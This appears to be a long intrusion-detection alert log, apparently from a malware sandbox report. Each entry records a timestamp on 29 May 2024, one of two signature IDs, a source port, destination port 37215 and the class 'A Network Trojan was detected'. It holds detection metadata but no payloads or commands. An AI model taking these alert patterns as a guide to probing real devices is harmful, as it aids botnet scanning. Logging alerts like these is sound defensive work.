                Timestamp:05/29/24-15:16:22.873205
                SID:2835222
                Source Port:48850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225393
                SID:2829579
                Source Port:37642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276508
                SID:2835222
                Source Port:51722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443011
                SID:2835222
                Source Port:53208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.663988
                SID:2835222
                Source Port:59686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560972
                SID:2835222
                Source Port:56052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916245
                SID:2835222
                Source Port:43366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324552
                SID:2829579
                Source Port:52196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032891
                SID:2829579
                Source Port:57302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533863
                SID:2835222
                Source Port:35324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612861
                SID:2835222
                Source Port:41508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887702
                SID:2835222
                Source Port:56904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915804
                SID:2829579
                Source Port:57448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180084
                SID:2835222
                Source Port:56754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800788
                SID:2835222
                Source Port:56414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728373
                SID:2829579
                Source Port:54546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431173
                SID:2835222
                Source Port:54066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784136
                SID:2835222
                Source Port:33642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786114
                SID:2829579
                Source Port:36176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371286
                SID:2835222
                Source Port:33390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763829
                SID:2829579
                Source Port:37328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685560
                SID:2835222
                Source Port:49070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823574
                SID:2835222
                Source Port:55454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660187
                SID:2829579
                Source Port:58620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.618156
                SID:2829579
                Source Port:35908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782455
                SID:2835222
                Source Port:51394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163998
                SID:2829579
                Source Port:48688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664090
                SID:2835222
                Source Port:58788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799345
                SID:2835222
                Source Port:48172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.610395
                SID:2829579
                Source Port:58618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385343
                SID:2829579
                Source Port:36300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224275
                SID:2829579
                Source Port:55292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287084
                SID:2835222
                Source Port:55104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009397
                SID:2829579
                Source Port:36046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653126
                SID:2835222
                Source Port:39388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283171
                SID:2829579
                Source Port:47718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075450
                SID:2835222
                Source Port:59462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415695
                SID:2829579
                Source Port:43512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964124
                SID:2835222
                Source Port:53908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684774
                SID:2829579
                Source Port:34310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224342
                SID:2829579
                Source Port:55302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574331
                SID:2829579
                Source Port:46962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321284
                SID:2829579
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663878
                SID:2829579
                Source Port:52742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631213
                SID:2835222
                Source Port:38416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911120
                SID:2835222
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419375
                SID:2829579
                Source Port:57496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432561
                SID:2835222
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993821
                SID:2835222
                Source Port:40794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226876
                SID:2829579
                Source Port:52194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992914
                SID:2835222
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910792
                SID:2829579
                Source Port:47152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.227947
                SID:2829579
                Source Port:35004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639455
                SID:2835222
                Source Port:42746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008352
                SID:2835222
                Source Port:49698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463589
                SID:2829579
                Source Port:39416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236744
                SID:2829579
                Source Port:59636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042567
                SID:2829579
                Source Port:49562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572284
                SID:2829579
                Source Port:49412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108971
                SID:2835222
                Source Port:49166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.276131
                SID:2835222
                Source Port:34540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841725
                SID:2829579
                Source Port:60514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091341
                SID:2829579
                Source Port:43008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538150
                SID:2829579
                Source Port:44900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654514
                SID:2835222
                Source Port:48218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927916
                SID:2829579
                Source Port:45828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.116531
                SID:2835222
                Source Port:42460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534752
                SID:2835222
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038436
                SID:2829579
                Source Port:55052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714241
                SID:2835222
                Source Port:57060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262539
                SID:2829579
                Source Port:56160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597312
                SID:2835222
                Source Port:34140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519782
                SID:2835222
                Source Port:56520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653720
                SID:2829579
                Source Port:56222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979651
                SID:2829579
                Source Port:35708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233188
                SID:2829579
                Source Port:43952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583997
                SID:2835222
                Source Port:50982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726231
                SID:2829579
                Source Port:44180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899402
                SID:2829579
                Source Port:55028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731707
                SID:2829579
                Source Port:34318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.080740
                SID:2835222
                Source Port:38870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022461
                SID:2829579
                Source Port:56780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422195
                SID:2829579
                Source Port:49598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361331
                SID:2829579
                Source Port:60506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073816
                SID:2835222
                Source Port:40902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262122
                SID:2829579
                Source Port:52878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555198
                SID:2835222
                Source Port:59844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223401
                SID:2835222
                Source Port:47318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815496
                SID:2835222
                Source Port:33304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970975
                SID:2829579
                Source Port:44342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113859
                SID:2829579
                Source Port:46010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575693
                SID:2835222
                Source Port:51108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630003
                SID:2835222
                Source Port:59478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266632
                SID:2835222
                Source Port:51392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870141
                SID:2835222
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022481
                SID:2835222
                Source Port:42856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728615
                SID:2829579
                Source Port:34384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228226
                SID:2829579
                Source Port:49706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871763
                SID:2829579
                Source Port:39324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872844
                SID:2829579
                Source Port:36276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229960
                SID:2835222
                Source Port:43858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911773
                SID:2835222
                Source Port:35860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001799
                SID:2829579
                Source Port:33214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793670
                SID:2835222
                Source Port:33950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177051
                SID:2829579
                Source Port:57776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562161
                SID:2835222
                Source Port:52998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038476
                SID:2835222
                Source Port:44754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845420
                SID:2829579
                Source Port:50318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209578
                SID:2835222
                Source Port:43624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665302
                SID:2835222
                Source Port:47604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436032
                SID:2829579
                Source Port:47654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519015
                SID:2829579
                Source Port:40356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857177
                SID:2829579
                Source Port:40036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876271
                SID:2829579
                Source Port:47134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663589
                SID:2829579
                Source Port:39894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868241
                SID:2829579
                Source Port:53364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556899
                SID:2835222
                Source Port:43862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225290
                SID:2835222
                Source Port:39298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870415
                SID:2835222
                Source Port:43858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859291
                SID:2835222
                Source Port:51346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071417
                SID:2835222
                Source Port:41284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325878
                SID:2835222
                Source Port:52870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573895
                SID:2829579
                Source Port:39266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079196
                SID:2835222
                Source Port:49550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740604
                SID:2829579
                Source Port:40968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653406
                SID:2835222
                Source Port:52238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417390
                SID:2829579
                Source Port:41112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.234085
                SID:2829579
                Source Port:44276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162303
                SID:2835222
                Source Port:37148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931765
                SID:2835222
                Source Port:41394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864152
                SID:2829579
                Source Port:56102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074655
                SID:2835222
                Source Port:59606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652356
                SID:2835222
                Source Port:53760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763160
                SID:2835222
                Source Port:34434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.818129
                SID:2829579
                Source Port:41354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582915
                SID:2829579
                Source Port:48986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265283
                SID:2829579
                Source Port:57576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587137
                SID:2829579
                Source Port:55096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572852
                SID:2829579
                Source Port:54134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140734
                SID:2835222
                Source Port:34028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438749
                SID:2829579
                Source Port:51580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664219
                SID:2829579
                Source Port:55638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325372
                SID:2835222
                Source Port:40592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321859
                SID:2829579
                Source Port:55674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369747
                SID:2835222
                Source Port:49182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520338
                SID:2835222
                Source Port:36654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664909
                SID:2835222
                Source Port:52580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584037
                SID:2829579
                Source Port:44202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225714
                SID:2829579
                Source Port:43514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263890
                SID:2829579
                Source Port:54584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870426
                SID:2829579
                Source Port:46976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675478
                SID:2829579
                Source Port:60418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854479
                SID:2835222
                Source Port:49366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833604
                SID:2829579
                Source Port:53944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938197
                SID:2835222
                Source Port:58850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915028
                SID:2829579
                Source Port:45122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967450
                SID:2829579
                Source Port:58050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.772352
                SID:2829579
                Source Port:45216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617333
                SID:2835222
                Source Port:55938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609740
                SID:2835222
                Source Port:46790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321081
                SID:2835222
                Source Port:33200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899129
                SID:2829579
                Source Port:37016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936452
                SID:2835222
                Source Port:58904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461323
                SID:2829579
                Source Port:56060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.953120
                SID:2829579
                Source Port:55466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969944
                SID:2829579
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029608
                SID:2835222
                Source Port:56548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896867
                SID:2835222
                Source Port:49244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726411
                SID:2835222
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504597
                SID:2829579
                Source Port:54628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850407
                SID:2835222
                Source Port:45996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900546
                SID:2829579
                Source Port:56100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855816
                SID:2835222
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.082045
                SID:2829579
                Source Port:51410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328073
                SID:2835222
                Source Port:39728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161313
                SID:2835222
                Source Port:49504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042856
                SID:2829579
                Source Port:45796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786910
                SID:2835222
                Source Port:55864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571015
                SID:2835222
                Source Port:58726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508730
                SID:2829579
                Source Port:59158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836308
                SID:2835222
                Source Port:34508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867553
                SID:2829579
                Source Port:35584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465443
                SID:2829579
                Source Port:45732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583428
                SID:2829579
                Source Port:42772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175723
                SID:2835222
                Source Port:56358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897335
                SID:2835222
                Source Port:33640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.933398
                SID:2829579
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966380
                SID:2829579
                Source Port:40116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321170
                SID:2829579
                Source Port:43066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571593
                SID:2829579
                Source Port:41422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.964125
                SID:2835222
                Source Port:55488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024463
                SID:2829579
                Source Port:54792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669751
                SID:2835222
                Source Port:37816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766993
                SID:2829579
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369679
                SID:2829579
                Source Port:53122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984964
                SID:2835222
                Source Port:34164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.888576
                SID:2829579
                Source Port:56310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942552
